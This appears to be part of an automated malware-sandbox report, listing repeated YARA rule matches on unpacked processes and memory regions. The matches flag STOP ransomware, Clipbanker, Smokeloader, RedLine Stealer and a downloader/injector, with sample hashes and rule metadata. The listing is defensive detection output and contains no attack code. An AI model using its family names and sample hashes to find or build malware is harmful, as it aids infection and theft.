                Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 30.2.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 30.2.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 20.0.3C54.exe.4a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.380036043.0000000000859000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.460164953.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000026.00000002.501652652.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
